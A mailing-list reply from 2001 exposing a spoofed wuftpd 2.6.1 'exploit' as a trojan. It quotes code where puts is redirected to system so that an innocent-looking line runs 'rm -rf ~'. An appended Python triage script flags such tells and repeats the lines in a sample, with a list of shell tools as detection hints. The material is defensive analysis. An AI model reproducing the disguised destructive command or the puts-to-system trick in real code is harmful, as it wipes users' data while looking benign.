Vulnerability Development mailing list archives

Re: wuftpd 2.6.1 advisory/exploit


From: mrcdz <mrcdz () datavibe net>
Date: Wed, 19 Sep 2001 13:57:51 -0400

You are correct, this is a spoof.
Do you think Carolyn would post something like this? :)

-- from "exploit":
 *
 * Demonstrates a flaw in the pre-authentication code of
 * wuftpd 2.6.x which allows us to gain control of the
 * target process by displacing a saved frame pointer.
 *

Obviously this is not a real vulnerability in wuftpd 2.6.1 nor an exploit.
If you look behind all the garble, you'll see this:
 
sprintf((char *)attack+4+i, "%c", (unsigned long)puts >> i * 8 & 0xff);

and then:

puts("echo ~ ok, it seems to have worked... remember: \");
puts("rm -rf is not elite ~");

The puts(3) function has been overwritten with the address of system(3), where
anyone skimming through the source code would think it is simply printing
those two lines. (Notice the backslash on the first, either a coding mistake
or to 'deter script kids'.) It is actually executing them via system(3).

Please do not run this code. Your home directory will be wiped out.
And if $HOME is set to '/', well then, you're in big trouble.

On Wed, Sep 19, 2001 at 08:38:14AM -0700, Blue Boar wrote:
Hey, I'm told that this exploit like eats your hard drive or something.
Caveat emptor and all, but I figured since I actually heard about this,
I'd let you know.  I guess it's a spoofed note.

                                      BB
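
Added example (not part of the original post or of the code it discusses): a small Python triage pass to run over an untrusted proof-of-concept before compiling it, flagging the two tells described in the message above: a libc function name used as a value rather than called, and an output call whose string reads like a shell command. The function lists, the shell-command hints and the sample source are assumptions of this example.

```python
import re

# Heuristic lists are assumptions of this example, not an exhaustive rule set.
LIBC = r"(?:puts|printf|fprintf|perror|system|popen|execl|execve)"
OUTPUT = r"(?:puts|printf|perror)"
# Comments and string literals, blanked so names inside them are ignored.
STRINGS_COMMENTS = re.compile(r'/\*.*?\*/|//[^\n]*|"(?:\\.|[^"\\\n])*"', re.S)
# A libc function name used as a value (cast, shifted, stored), not called.
ADDR_USE = re.compile(r"(?<![\w.>])(" + LIBC + r")\b(?!\s*\()")
# Text after the opening quote of an output call; tolerates unterminated literals.
OUT_CALL = re.compile(r"\b(" + OUTPUT + r')\s*\(\s*"([^\n]*)')
SHELL_HINT = re.compile(r"^\s*(?:echo|rm|sh|wget|curl|chmod|dd)\s|/bin/sh")

def triage(source):
    """Return sorted (line_number, finding) pairs for a C source string."""
    findings = set()
    # Replace every non-newline character so line numbers stay aligned.
    code = STRINGS_COMMENTS.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), source)
    for m in ADDR_USE.finditer(code):
        line = code.count("\n", 0, m.start()) + 1
        findings.add((line, "address of %s() taken" % m.group(1)))
    for m in OUT_CALL.finditer(source):
        if SHELL_HINT.search(m.group(2)):
            line = source.count("\n", 0, m.start()) + 1
            findings.add((line, "%s() argument reads like a shell command" % m.group(1)))
    return sorted(findings)

# Constructed sample, modeled on the lines quoted in the post (never compiled or run).
SAMPLE = r'''
/* sample: mentions of puts or system in comments are ignored */
#include <stdio.h>
int main(void) {
    char attack[64]; int i;
    for (i = 0; i < 4; i++)
        sprintf((char *)attack+4+i, "%c", (unsigned long)puts >> i * 8 & 0xff);
    puts("connecting to target...");
    puts("echo ~ ok, it seems to have worked... remember: \");
    puts("rm -rf is not elite ~");
    return 0;
}
'''

if __name__ == "__main__":
    for line, finding in triage(SAMPLE):
        print("line %d: %s" % (line, finding))
```

A hit is a reason to read the flagged lines by hand, not a verdict; a clean result does not make unknown code safe to run.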

